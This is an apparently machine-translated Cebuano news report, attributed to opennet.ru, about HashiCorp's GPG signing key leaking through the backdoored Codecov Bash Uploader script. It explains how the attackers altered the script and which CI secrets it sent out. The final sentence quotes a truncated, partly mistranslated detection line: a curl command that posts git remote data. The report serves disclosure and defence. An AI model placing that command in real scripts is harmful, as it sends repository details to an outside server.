Ang HashiCorp, nga nailhan sa pagpalambo sa open source nga mga himan Vagrant, Packer, Nomad ug Terraform, mipahibalo sa pagtulo sa pribadong GPG nga yawe nga gigamit sa paghimo og digital nga mga pirma nga nagpamatuod sa mga pagpagawas. Ang mga tig-atake nga naka-access sa GPG key posibling makahimo og mga tinago nga mga pagbag-o sa mga produkto sa HashiCorp pinaagi sa pag-verify niini gamit ang saktong digital signature. Sa parehas nga oras, ang kompanya nag-ingon nga sa panahon sa pag-audit, walaβy mga timailhan sa pagsulay sa paghimo sa ingon nga mga pagbag-o nga nahibal-an.
Sa pagkakaron, ang gikompromiso nga yawe sa GPG gibawi ug usa ka bag-ong yawe ang gipaila sa dapit niini. Ang problema nakaapekto lamang sa pag-verify gamit ang SHA256SUM ug SHA256SUM.sig nga mga file, ug wala makaapekto sa henerasyon sa mga digital nga pirma alang sa Linux DEB ug RPM nga mga pakete nga gihatag pinaagi sa releases.hashicorp.com, ingon man sa pagpagawas sa mga mekanismo sa pag-verify alang sa macOS ug Windows (AuthentiCode) .
Ang pagtulo nahitabo tungod sa paggamit sa Codecov Bash Uploader (codecov-bash) nga script sa imprastraktura, nga gidesinyo sa pag-download sa mga report sa coverage gikan sa padayon nga integration system. Atol sa pag-atake sa kompanya sa Codecov, usa ka backdoor ang gitago sa piho nga script, diin ang mga password ug mga yawe sa pag-encrypt gipadala sa server sa mga tig-atake.
Aron ma-hack, gipahimuslan sa mga tig-atake ang usa ka sayup sa proseso sa paghimo sa imahe sa Codecov Docker, nga gitugotan sila nga makuha ang data sa pag-access sa GCS (Google Cloud Storage), kinahanglan aron makahimo mga pagbag-o sa script sa Bash Uploader nga giapod-apod gikan sa codecov.io website. Ang mga pagbag-o gihimo balik kaniadtong Enero 31, nagpabilin nga wala mahibal-an sulod sa duha ka bulan ug gitugotan ang mga tig-atake sa pagkuha sa impormasyon nga gitipigan sa mga customer nga padayon nga integration system environment. Gamit ang dugang nga malisyoso nga code, ang mga tig-atake makakuha og impormasyon bahin sa gisulayan nga Git repository ug tanang mga variable sa palibot, lakip ang mga token, encryption key ug password, nga gipasa ngadto sa padayon nga integration system aron maorganisar ang access sa application code, repository ug serbisyo sama sa Amazon Web Services ug GitHub .
Dugang pa sa direktang tawag, ang Codecov Bash Uploader script gigamit isip kabahin sa ubang mga uploader, sama sa Codecov-action (Github), Codecov-circleci-orb ug Codecov-bitrise-step, kansang mga tiggamit apektado usab sa problema. Ang tanan nga tiggamit sa codecov-bash ug mga may kalabutan nga produkto girekomenda nga i-audit ang ilang mga imprastraktura, ingon man usab ang pag-ilis sa mga password ug mga yawe sa pag-encrypt. Mahimo nimong susihon ang presensya sa usa ka backdoor sa script pinaagi sa presensya sa linya nga curl -sm 0.5 -d "$(git remote -v)/upload /v2 || tinuod
Source: opennet.ru